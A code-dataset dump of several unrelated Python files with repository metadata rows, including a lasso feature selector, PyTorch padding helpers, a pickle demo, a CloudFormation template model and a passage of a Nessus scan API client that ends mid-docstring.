>>> selector = LassoSelector(2).fit(df['colnames'], df['coef'])
>>> X = [[0, 0, 1, 0], [1, 1, 0, 0], [0, 1, 0, 0]]
>>> selector.transform(X)
[[0, 1], [1, 0], [1, 0]]
"""
def __init__(self, lasso_coefs, feature_col, coef_col,
n_features=64):
self.n_features = n_features
self.feature_col = feature_col
self.lasso_coefs = lasso_coefs
self.coef_col = coef_col
def fit(self, X, y):
return self
def transform(self, X):
"""
Parameters
----------
X : pd.DataFrame
contains only features
Returns
-------
ndarray
contains the best n_features
"""
self.lasso_coefs['abs_coef'] = abs(self.lasso_coefs[self.coef_col])
self.lasso_coefs.sort_values(['abs_coef'], ascending=False,
inplace=True)
# keeping top features according to lasso
coefs_to_keep = self.lasso_coefs.iloc[:self.n_features, :]
coefs_to_keep = coefs_to_keep[self.feature_col]
return X[coefs_to_keep.values].values
| 29.486842 | 77 | 0.604641 | 294 | 2,241 | 4.465986 | 0.37415 | 0.076161 | 0.063976 | 0.024372 | 0.054836 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023154 | 0.286925 | 2,241 | 75 | 78 | 29.88 | 0.798498 | 0.551986 | 0 | 0 | 0 | 0 | 0.019925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.111111 | 0.055556 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4197fe5fe8d16fcca6d82bcf73ee4d6614030b79 | 3,407 | py | Python | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | 2 | 2022-03-28T09:46:38.000Z | 2022-03-28T14:12:32.000Z | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | null | null | null | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Padding Layers.
"""
from __future__ import annotations
import math
from typing import Union
import torch.nn.functional as F
from torch import nn
from torch import Tensor
from onevision.factory import PADDING_LAYERS
from onevision.type import Int2T
__all__ = [
"autopad",
"get_padding",
"get_padding_value",
"get_same_padding",
"is_static_pad",
"pad_same"
]
# MARK: - Functional
def autopad(kernel_size: Int2T, padding: Union[str, Int2T, None] = None):
"""Pad to `same`."""
if padding is None:
padding = (kernel_size // 2 if isinstance(kernel_size, int)
else [input // 2 for input in kernel_size]) # auto-pad
return padding
def pad_same(
x : Tensor,
kernel_size: Int2T,
stride : Int2T,
dilation : Int2T = (1, 1),
value : float = 0
):
"""Dynamically pad input with 'same' padding for conv with specified
args.
"""
ih, iw = x.size()[-2:]
pad_h = get_same_padding(ih, kernel_size[0], stride[0], dilation[0])
pad_w = get_same_padding(iw, kernel_size[1], stride[1], dilation[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(
x,
[pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2],
value=value
)
return x
def get_padding_value(
padding: Union[str, Int2T, None], kernel_size: Int2T, **kwargs
) -> tuple[(tuple, int), bool]:
dynamic = False
if isinstance(padding, str):
# For any string padding, the padding will be calculated for you, one
# of three ways
padding = padding.lower()
if padding == "same":
# TF compatible 'SAME' padding, has a performance and GPU memory
# allocation impact
if is_static_pad(kernel_size, **kwargs):
# static case, no extra overhead
padding = get_padding(kernel_size, **kwargs)
else:
# Dynamic 'SAME' padding, has runtime/GPU memory overhead
padding = 0
dynamic = True
elif padding == "valid":
# 'VALID' padding, same as padding=0
padding = 0
else:
# Default to PyTorch style 'same'-ish symmetric padding
padding = get_padding(kernel_size, **kwargs)
return padding, dynamic
def get_padding(kernel_size: int, stride: int = 1, dilation: int = 1, **_) -> int:
"""Calculate symmetric padding for a convolution.
FYI: `**_` mean ignore the rest of the args.
"""
padding = ((stride - 1) + dilation * (kernel_size - 1)) // 2
return padding
def get_same_padding(x: int, kernel_size: int, stride: int, dilation: int) -> int:
"""Calculate asymmetric TensorFlow-like 'same' padding for a convolution.
"""
return max((math.ceil(x / stride) - 1) * stride +
(kernel_size - 1) * dilation + 1 - x, 0)
def is_static_pad(kernel_size: int, stride: int = 1, dilation: int = 1, **_) -> bool:
"""Can `same` padding for given args be done statically?."""
return stride == 1 and (dilation * (kernel_size - 1)) % 2 == 0
# MARK: - Register
PADDING_LAYERS.register(name="zero", module=nn.ZeroPad2d)
PADDING_LAYERS.register(name="reflection", module=nn.ReflectionPad2d)
PADDING_LAYERS.register(name="replication", module=nn.ReplicationPad2d)
| 29.885965 | 85 | 0.606692 | 441 | 3,407 | 4.537415 | 0.297052 | 0.084958 | 0.027986 | 0.029985 | 0.138931 | 0.067966 | 0.034983 | 0.034983 | 0.034983 | 0 | 0 | 0.019433 | 0.275022 | 3,407 | 113 | 86 | 30.150442 | 0.790688 | 0.221016 | 0 | 0.121212 | 0 | 0 | 0.040895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.121212 | 0 | 0.30303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419b7fd6852c60efa1fd82faf32167dd58882039 | 236 | py | Python | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# FileName:use_pickle.py
# -*- coding: utf-8 -*-
""" 通过pickle序列化对象"""
import pickle
bob = dict(name='Bob', age=20, score=88)
data = pickle.dumps(bob)
print(data)
re_bob = pickle.loads(data)
print(re_bob)
| 11.8 | 40 | 0.661017 | 36 | 236 | 4.25 | 0.694444 | 0.065359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029851 | 0.148305 | 236 | 19 | 41 | 12.421053 | 0.731343 | 0.338983 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419d836e21b88898e0497e1625d6eddb5fed1199 | 5,349 | py | Python | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | from datetime import date
from typing import Any, ClassVar, Collection, Dict, List, Optional, Type, Union
from pycfmodel.action_expander import expand_actions
from pycfmodel.constants import AWS_NOVALUE
from pycfmodel.model.base import CustomModel
from pycfmodel.model.parameter import Parameter
from pycfmodel.model.resources.generic_resource import GenericResource
from pycfmodel.model.resources.resource import Resource
from pycfmodel.model.resources.types import ResourceModels
from pycfmodel.model.types import Resolvable
from pycfmodel.resolver import _extended_bool, resolve
class CFModel(CustomModel):
"""
Template that describes AWS infrastructure.
Properties:
- AWSTemplateFormatVersion
- Conditions: Conditions that control behaviour of the template.
- Description: Description for the template.
- Mappings: A 3 level mapping of keys and associated values.
- Metadata: Additional information about the template.
- Outputs: Output values of the template.
- Parameters: Parameters to the template.
- Resources: Stack resources and their properties.
- Rules
- Transform: For serverless applications, specifies the version of the AWS Serverless Application Model (AWS SAM) to use.
More info at [AWS Docs](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html)
"""
AWSTemplateFormatVersion: Optional[date]
Conditions: Optional[Dict] = {}
Description: Optional[str] = None
Mappings: Optional[Dict[str, Dict[str, Dict[str, Any]]]] = {}
Metadata: Optional[Dict[str, Dict]] = None
Outputs: Optional[Dict[str, Dict[str, Union[str, Dict]]]] = {}
Parameters: Optional[Dict[str, Parameter]] = {}
Resources: Dict[str, Resolvable[Union[ResourceModels, GenericResource]]] = {}
Rules: Optional[Dict] = {}
Transform: Optional[List]
PSEUDO_PARAMETERS: ClassVar[Dict[str, Union[str, List[str]]]] = {
# default pseudo parameters
"AWS::AccountId": "123456789012",
"AWS::NotificationARNs": [],
"AWS::NoValue": AWS_NOVALUE,
"AWS::Partition": "aws",
"AWS::Region": "eu-west-1",
"AWS::StackId": "",
"AWS::StackName": "",
"AWS::URLSuffix": "amazonaws.com",
}
def resolve(self, extra_params=None) -> "CFModel":
"""
Resolve all intrinsic functions on the template.
Arguments:
extra_params: Values of parameters passed to the Cloudformation.
Returns:
A new CFModel.
"""
extra_params = {} if extra_params is None else extra_params
# default parameters
params = {}
for key, parameter in self.Parameters.items():
passed_value = extra_params.pop(key, None)
ref_value = parameter.get_ref_value(passed_value)
if ref_value is not None:
params[key] = ref_value
extended_parameters = {**self.PSEUDO_PARAMETERS, **params, **extra_params}
dict_value = self.dict()
if self.Conditions:
conditions = dict_value.pop("Conditions")
else:
conditions = {}
resolved_conditions = {
key: _extended_bool(resolve(value, extended_parameters, self.Mappings, {}))
for key, value in conditions.items()
}
resources = dict_value.pop("Resources")
resolved_resources = {
key: resolve(value, extended_parameters, self.Mappings, resolved_conditions)
for key, value in resources.items()
}
return CFModel(**dict_value, Conditions=resolved_conditions, Resources=resolved_resources)
def expand_actions(self) -> "CFModel":
"""
Returns a model which has expanded all wildcards (`*`) to get all implied actions for every resource.
For example:\n
- a model containing `s3:*` will be expanded to list all the possible S3 actions.
- a model containing `s3:Get*` will be expanded to all the `Get*` actions only.
This method can handle the cases of both `Action` and `NotAction`.
[Known AWS Actions](https://github.com/Skyscanner/pycfmodel/blob/master/pycfmodel/cloudformation_actions.py).
These known actions can be updated by executing:
```
python3 scripts/generate_cloudformation_actions_file.py
```
"""
dict_value = self.dict()
resources = dict_value.pop("Resources")
expanded_resources = {key: expand_actions(value) for key, value in resources.items()}
return CFModel(**dict_value, Resources=expanded_resources)
def resources_filtered_by_type(
self, allowed_types: Collection[Union[str, Type[Resource]]]
) -> Dict[str, Dict[str, Resource]]:
"""
Filtered resources based on types.
Arguments:
allowed_types: Collection of desired types.
Returns:
Dictionary where key is the logical id and value is the resource.
"""
result = {}
allowed_resource_classes = tuple(x for x in allowed_types if isinstance(x, type))
for resource_name, resource in self.Resources.items():
if isinstance(resource, allowed_resource_classes) or resource.Type in allowed_types:
result[resource_name] = resource
return result
| 39.043796 | 125 | 0.665919 | 602 | 5,349 | 5.815615 | 0.303987 | 0.021994 | 0.030848 | 0.015995 | 0.081691 | 0.051985 | 0.027992 | 0.027992 | 0.027992 | 0.027992 | 0 | 0.00442 | 0.238736 | 5,349 | 136 | 126 | 39.330882 | 0.855354 | 0.306786 | 0 | 0.057143 | 0 | 0 | 0.055572 | 0.00611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042857 | false | 0.028571 | 0.157143 | 0 | 0.414286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419de91687fa41f1d418876dd9614a95ee81af4f | 39,788 | py | Python | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | nessus/scans.py | tharvik/nessus | 4551c319ac6cb3026ddb096a0f6f71f060a578ab | [
"CC0-1.0"
] | null | null | null | """
sub modules for everything about the scans
"""
from enum import Enum
from uuid import uuid4
from typing import Iterable, Mapping, Union, Optional, MutableMapping
from nessus.base import LibNessusBase
from nessus.editor import NessusTemplate
from nessus.model import lying_exist, lying_type, Object, lying_exist_and_type, allow_to_exist
from nessus.permissions import NessusPermission
from nessus.policies import NessusPolicy
class NessusScanType(Enum):
    """
    Kind of scanner a scan runs on, as reported by the Nessus API.
    """
    local = 'local'  # scan executed by the local scanner
    remote = 'remote'  # scan executed by a remote scanner
    agent = 'agent'  # scan executed by a Nessus agent
class NessusScanStatus(Enum):
    """
    Current status of a scan, as reported by the Nessus API.

    Known deviations from the documented API (lies):
     - `empty` was added because sometimes, nessus return it (but it is not documented)
     - `canceled` is returned instead of `cancelled`
     - `processing` was added because sometimes, nessus return it (but it is not documented)
    """
    completed = 'completed'
    aborted = 'aborted'
    imported = 'imported'
    pending = 'pending'
    running = 'running'
    resuming = 'resuming'
    canceling = 'canceling'
    cancelled = 'cancelled'  # documented spelling; see `canceled` below
    pausing = 'pausing'
    paused = 'paused'
    stopping = 'stopping'
    stopped = 'stopped'
    empty = 'empty'  # undocumented, but observed in real answers
    canceled = 'canceled'  # undocumented spelling actually returned by nessus
    processing = 'processing'  # undocumented, but observed in real answers
class NessusScan(Object):
    """
    A scan as listed by the Nessus API.

    Two instances are considered equal when they share the same ``id``
    (and hash accordingly).

    Known deviations from the documented API (lies):
     - `type` which is none but should be NessusScanType (str)
     - `status` which can be 'empty' but should be one of NessusScanStatus
     - `use_dashboard` which do not always exists
    """

    def __init__(self, scan_id: int, uuid: str, name: str, type: NessusScanType, owner: str, enabled: bool,
                 folder_id: int,
                 read: bool, status: NessusScanStatus, shared: bool, user_permissions: int, creation_date: int,
                 last_modification_date: int, control: bool, starttime: str, timezone: str, rrules: str,
                 use_dashboard: bool) -> None:
        # NOTE: the `type` parameter deliberately shadows the builtin so the
        # signature mirrors the API field name; renaming it would break
        # keyword callers.
        self.id = scan_id
        self.uuid = uuid
        self.name = name
        self.type = type
        self.owner = owner
        self.enabled = enabled
        self.folder_id = folder_id
        self.read = read
        self.status = status
        self.shared = shared
        self.user_permissions = user_permissions
        self.creation_date = creation_date
        self.last_modification_date = last_modification_date
        self.control = control
        self.starttime = starttime
        self.timezone = timezone
        self.rrules = rrules
        self.use_dashboard = use_dashboard

    def __eq__(self, other):
        # Return NotImplemented (rather than False) for foreign types so
        # Python can try the reflected comparison; the net result for callers
        # comparing against unrelated objects is unchanged (identity fallback
        # still yields False).
        if not isinstance(other, NessusScan):
            return NotImplemented
        return self.id == other.id

    def __hash__(self):
        # consistent with __eq__: identity is solely the scan id
        return hash(self.id)

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScan':
        """
        Build a NessusScan from the JSON dict sent back by the server,
        working around the API lies documented on the class.
        """
        scan_id = int(json_dict['id'])
        uuid = str(json_dict['uuid'])
        name = str(json_dict['name'])
        # `type` may be None in practice, hence lying_type instead of a plain cast
        scan_type = lying_type(json_dict['type'], NessusScanType)
        owner = str(json_dict['owner'])
        enabled = bool(json_dict['enabled'])
        folder_id = int(json_dict['folder_id'])
        read = bool(json_dict['read'])
        status = NessusScanStatus(json_dict['status'])
        shared = bool(json_dict['shared'])
        user_permissions = int(json_dict['user_permissions'])
        creation_date = int(json_dict['creation_date'])
        last_modification_date = int(json_dict['last_modification_date'])
        control = bool(json_dict['control'])
        starttime = str(json_dict['starttime'])
        timezone = str(json_dict['timezone'])
        rrules = str(json_dict['rrules'])
        # key may be absent from the answer, hence lying_exist
        use_dashboard = lying_exist(json_dict, 'use_dashboard', bool)

        return NessusScan(scan_id, uuid, name, scan_type, owner, enabled, folder_id, read, status, shared,
                          user_permissions,
                          creation_date, last_modification_date, control, starttime, timezone, rrules, use_dashboard)
class NessusScanCreated(Object):
    """
    Answer returned by the Nessus API when a scan has just been created.

    Known deviations from the documented API (lies):
     - `notification_filter_type` does not always exist
     - `tag_id` does not always exist
    """

    def __init__(self, creation_date: int, custom_targets: str, default_permisssions: int, description: str,
                 emails: str, scan_id: int, last_modification_date: int, name: str, notification_filter_type: str,
                 notification_filters: str, owner: str, owner_id: int, policy_id: int, enabled: bool, rrules: str,
                 scanner_id: int, shared: int, starttime: str, tag_id: int, timezone: str, scan_type: str,
                 user_permissions: int, uuid: str, use_dashboard: bool) -> None:
        # NOTE: `default_permisssions` keeps the misspelling of the API field.
        self.creation_date = creation_date
        self.custom_targets = custom_targets
        self.default_permisssions = default_permisssions
        self.description = description
        self.emails = emails
        self.id = scan_id
        self.last_modification_date = last_modification_date
        self.name = name
        self.notification_filter_type = notification_filter_type
        self.notification_filters = notification_filters
        self.owner = owner
        self.owner_id = owner_id
        self.policy_id = policy_id
        self.enabled = enabled
        self.rrules = rrules
        self.scanner_id = scanner_id
        self.shared = shared
        self.starttime = starttime
        self.tag_id = tag_id
        self.timezone = timezone
        self.type = scan_type
        self.user_permissions = user_permissions
        self.uuid = uuid
        self.use_dashboard = use_dashboard

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanCreated':
        """
        Build a NessusScanCreated from the JSON dict sent back by the server,
        working around the API lies documented on the class.
        """
        return NessusScanCreated(
            creation_date=int(json_dict['creation_date']),
            custom_targets=str(json_dict['custom_targets']),
            default_permisssions=int(json_dict['default_permisssions']),
            description=str(json_dict['description']),
            emails=str(json_dict['emails']),
            scan_id=int(json_dict['id']),
            last_modification_date=int(json_dict['last_modification_date']),
            name=str(json_dict['name']),
            # key may be absent from the answer, hence lying_exist
            notification_filter_type=lying_exist(json_dict, 'notification_filter_type', str),
            notification_filters=str(json_dict['notification_filters']),
            owner=str(json_dict['owner']),
            owner_id=int(json_dict['owner_id']),
            policy_id=int(json_dict['policy_id']),
            enabled=bool(json_dict['enabled']),
            rrules=str(json_dict['rrules']),
            scanner_id=int(json_dict['scanner_id']),
            shared=int(json_dict['shared']),
            starttime=str(json_dict['starttime']),
            # key may be absent from the answer, hence lying_exist
            tag_id=lying_exist(json_dict, 'tag_id', int),
            timezone=str(json_dict['timezone']),
            scan_type=str(json_dict['type']),
            user_permissions=int(json_dict['user_permissions']),
            uuid=str(json_dict['uuid']),
            use_dashboard=bool(json_dict['use_dashboard']),
        )
class NessusScanDetailsInfo(Object):
    """
    `info` part of the details of a scan.

    Known deviations from the documented API (lies):
     - `edit_allowed` is not always existing
     - `policy` is not always existing
     - `pci_can_upload` is not always existing
     - `hasaudittrail` is not always existing
     - `folder_id` is sometimes None
     - `targets` is not always existing
     - `timestamp` is not always existing
     - `haskb` is not always existing
     - `uuid` is not always existing
     - `hostcount` is not always existing
     - `scan_end` is not always existing
    """

    def __init__(self, acls: Iterable[NessusPermission], edit_allowed: bool, status: str, policy: str,
                 pci_can_upload: bool, hasaudittrail: bool,
                 scan_start: str, folder_id: int, targets: str, timestamp: int, object_id: int, scanner_name: str,
                 haskb: bool, uuid: str, hostcount: int, scan_end: str, name: str, user_permissions: int,
                 control: bool) -> None:
        self.acls = acls
        self.edit_allowed = edit_allowed
        self.status = status
        self.policy = policy
        self.pci_can_upload = pci_can_upload
        self.hasaudittrail = hasaudittrail
        self.scan_start = scan_start
        self.folder_id = folder_id
        self.targets = targets
        self.timestamp = timestamp
        self.object_id = object_id
        self.scanner_name = scanner_name
        self.haskb = haskb
        self.uuid = uuid
        self.hostcount = hostcount
        self.scan_end = scan_end
        self.name = name
        self.user_permissions = user_permissions
        self.control = control

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetailsInfo':
        """
        Build a NessusScanDetailsInfo from the JSON dict sent back by the
        server, working around the API lies documented on the class.
        """
        # every permission entry is itself a JSON object
        parsed_acls = {NessusPermission.from_json(acl) for acl in json_dict['acls']}

        return NessusScanDetailsInfo(
            acls=parsed_acls,
            edit_allowed=lying_exist(json_dict, 'edit_allowed', bool),
            status=str(json_dict['status']),
            policy=lying_exist(json_dict, 'policy', str),
            # note the dashes in the actual JSON key
            pci_can_upload=lying_exist(json_dict, 'pci-can-upload', bool),
            hasaudittrail=lying_exist(json_dict, 'hasaudittrail', bool),
            scan_start=str(json_dict['scan_start']),
            folder_id=lying_type(json_dict['folder_id'], int),  # it's None actually
            targets=lying_exist(json_dict, 'targets', str),
            timestamp=lying_exist(json_dict, 'timestamp', int),
            object_id=int(json_dict['object_id']),
            scanner_name=str(json_dict['scanner_name']),
            haskb=lying_exist(json_dict, 'haskb', bool),
            uuid=lying_exist(json_dict, 'uuid', str),
            hostcount=lying_exist(json_dict, 'hostcount', int),
            scan_end=lying_exist(json_dict, 'scan_end', str),
            name=str(json_dict['name']),
            user_permissions=int(json_dict['user_permissions']),
            control=bool(json_dict['control']),
        )
class NessusScanHost(Object):
    """
    One host targeted by a scan, with its per-severity finding counters and
    scan progress.

    Known deviations from the documented API (lies):
     - `hostname` can be str
    """

    def __init__(self, host_id: int, host_index: str, hostname: int, progress: str, critical: int, high: int,
                 medium: int, low: int, info: int, totalchecksconsidered: int, numchecksconsidered: int,
                 scanprogresstotal: int, scanprogresscurrent: int, score: int) -> None:
        self.host_id = host_id
        self.host_index = host_index
        self.hostname = hostname
        self.progress = progress
        self.critical = critical
        self.high = high
        self.medium = medium
        self.low = low
        self.info = info
        self.totalchecksconsidered = totalchecksconsidered
        self.numchecksconsidered = numchecksconsidered
        self.scanprogresstotal = scanprogresstotal
        self.scanprogresscurrent = scanprogresscurrent
        self.score = score

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHost':
        """
        Build a NessusScanHost from the JSON dict sent back by the server,
        working around the API lies documented on the class.
        """
        return NessusScanHost(
            host_id=int(json_dict['host_id']),
            host_index=str(json_dict['host_index']),
            # documented as int but observed as str, hence lying_type
            hostname=lying_type(json_dict['hostname'], int, str),
            progress=str(json_dict['progress']),
            critical=int(json_dict['critical']),
            high=int(json_dict['high']),
            medium=int(json_dict['medium']),
            low=int(json_dict['low']),
            info=int(json_dict['info']),
            totalchecksconsidered=int(json_dict['totalchecksconsidered']),
            numchecksconsidered=int(json_dict['numchecksconsidered']),
            scanprogresstotal=int(json_dict['scanprogresstotal']),
            scanprogresscurrent=int(json_dict['scanprogresscurrent']),
            score=int(json_dict['score']),
        )
class NessusScanNote(Object):
    """A note attached to a scan (title, message body, severity level)."""
    def __init__(self, title: str, message: str, severity: int) -> None:
        self.title = title
        self.message = message
        self.severity = severity

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanNote':
        """Parse one element of the `notes` array."""
        return NessusScanNote(str(json_dict['title']),
                              str(json_dict['message']),
                              int(json_dict['severity']))
class NessusScanRemediation(Object):
    """A single remediation suggestion with its affected host/vuln counts."""
    def __init__(self, value: str, remediation: str, hosts: int, vulns: int) -> None:
        self.value = value
        self.remediation = remediation
        self.hosts = hosts
        self.vulns = vulns

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanRemediation':
        """Parse one element of the `remediations` array."""
        return NessusScanRemediation(str(json_dict['value']),
                                     str(json_dict['remediation']),
                                     int(json_dict['hosts']),
                                     int(json_dict['vulns']))
class NessusScanDetailsRemediations(Object):
    """
    Remediation summary section of a scan-details response.

    lies:
    - `remediations` can be None
    """
    def __init__(self, remediations: Iterable[NessusScanRemediation], num_hosts: int, num_cves: int,
                 num_impacted_hosts: int, num_remediated_cves: int) -> None:
        self.remediations = remediations
        self.num_hosts = num_hosts
        self.num_cves = num_cves
        self.num_impacted_hosts = num_impacted_hosts
        self.num_remediated_cves = num_remediated_cves

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetailsRemediations':
        """Parse the `remediations` JSON object.

        `remediations` may be None on the wire; `lying_type` supplies the
        empty-list fallback so the comprehension yields an empty set.
        """
        # BUG FIX: each element is a JSON dict and must go through
        # NessusScanRemediation.from_json; the previous code passed the raw
        # dict to the 4-positional-argument constructor, raising TypeError.
        remediations = {NessusScanRemediation.from_json(remediation) for remediation in
                        lying_type(json_dict['remediations'], list, lambda x: None, list())}
        num_hosts = int(json_dict['num_hosts'])
        num_cves = int(json_dict['num_cves'])
        num_impacted_hosts = int(json_dict['num_impacted_hosts'])
        num_remediated_cves = int(json_dict['num_remediated_cves'])
        return NessusScanDetailsRemediations(remediations, num_hosts, num_cves, num_impacted_hosts,
                                             num_remediated_cves)
class NessusScanVulnerability(Object):
    """One vulnerability summary row from a scan-details response."""
    def __init__(self, plugin_id: int, plugin_name: str, plugin_family: str, count: int, vuln_index: int,
                 severity_index: int) -> None:
        self.plugin_id = plugin_id
        self.plugin_name = plugin_name
        self.plugin_family = plugin_family
        self.count = count
        self.vuln_index = vuln_index
        self.severity_index = severity_index

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanVulnerability':
        """Parse one element of the `vulnerabilities` (or `compliance`) array."""
        return NessusScanVulnerability(
            int(json_dict['plugin_id']),
            str(json_dict['plugin_name']),
            str(json_dict['plugin_family']),
            int(json_dict['count']),
            int(json_dict['vuln_index']),
            int(json_dict['severity_index']),
        )
class NessusScanHistory(Object):
    """One entry of a scan's run history."""
    def __init__(self, history_id: int, uuid: str, owner_id: int, status: str, creation_date: int,
                 last_modification_date: int) -> None:
        self.history_id = history_id
        self.uuid = uuid
        self.owner_id = owner_id
        self.status = status
        # Timestamps are kept as the raw integer epochs the server sends.
        self.creation_date = creation_date
        self.last_modification_date = last_modification_date

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanHistory':
        """Parse one element of the `history` array."""
        return NessusScanHistory(
            int(json_dict['history_id']),
            str(json_dict['uuid']),
            int(json_dict['owner_id']),
            str(json_dict['status']),
            int(json_dict['creation_date']),
            int(json_dict['last_modification_date']),
        )
class NessusScanFilterControl(Object):
    """
    UI control description of a scan report filter.

    lies:
    - `readable_regest` is not always there
    - `regex` is not always there
    - `options` is not always there
    """
    # FIXME what is the type of `options`?
    def __init__(self, type: str, readable_regest: str, regex: str, options: Iterable) -> None:
        # `type` shadows the builtin but is kept for API compatibility.
        self.type = type
        self.readable_regest = readable_regest
        self.regex = regex
        self.options = options

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanFilterControl':
        """Parse a filter `control` object; optional keys go through lying_exist."""
        return NessusScanFilterControl(
            str(json_dict['type']),
            lying_exist(json_dict, 'readable_regest', str),
            lying_exist(json_dict, 'regex', str),
            lying_exist(json_dict, 'options', str),
        )
class NessusScanFilterOperator(Enum):
    """Comparison operators a scan report filter may support.

    Values are the wire strings the Nessus API uses (note the dashes in the
    date variants, which are not valid Python identifiers).
    """
    eq = 'eq'
    neq = 'neq'
    lt = 'lt'
    gt = 'gt'
    match = 'match'
    nmatch = 'nmatch'
    date_eq = 'date-eq'
    date_neq = 'date-neq'
    date_lt = 'date-lt'
    date_gt = 'date-gt'
class NessusScanFilter(Object):
    """A filter available for scan reports, with its operators and UI control."""
    def __init__(self, name: str, readable_name: str, operators: Iterable[NessusScanFilterOperator],
                 control: NessusScanFilterControl) -> None:
        self.name = name
        self.readable_name = readable_name
        self.operators = operators
        self.control = control

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanFilter':
        """Parse one element of the `filters` array."""
        return NessusScanFilter(
            str(json_dict['name']),
            str(json_dict['readable_name']),
            {NessusScanFilterOperator(operator) for operator in json_dict['operators']},
            NessusScanFilterControl.from_json(json_dict['control']),
        )
class NessusScanDetails(Object):
    """
    Full scan-details response (GET /scans/{id}).

    we currently drop the `dashboard` field, is it needed?
    lies:
    - `hosts` not always existing
    - `comphosts` not always existing
    - `notes` not always existing
    - `notes` is sometimes None
    - `remediations` not always existing
    - `vulnerabilities` not always existing
    - `compliance` not always existing
    - `history` is sometimes None
    - `filters` not always existing
    """
    # NOTE: `vulnerabilites` (sic) is a typo kept as-is for backward
    # compatibility — renaming the parameter/attribute would break callers.
    def __init__(self, info: NessusScanDetailsInfo, hosts: Iterable[NessusScanHost],
                 comphosts: Iterable[NessusScanHost], notes: Iterable[NessusScanNote],
                 remediations: NessusScanDetailsRemediations, vulnerabilites: Iterable[NessusScanVulnerability],
                 compliance: Iterable[NessusScanVulnerability], history: Iterable[NessusScanHistory],
                 filters: Iterable[NessusScanFilter]) -> None:
        self.info = info
        self.hosts = hosts
        self.comphosts = comphosts
        self.notes = notes
        self.remediations = remediations
        self.vulnerabilites = vulnerabilites
        self.compliance = compliance
        self.history = history
        self.filters = filters

    @staticmethod
    def from_json(json_dict: Mapping[str, Union[int, str, bool]]) -> 'NessusScanDetails':
        """Parse a scan-details response, tolerating the schema lies listed above.

        `lying_exist` handles keys that may be absent; `lying_type` /
        `lying_exist_and_type` additionally handle keys whose value may be
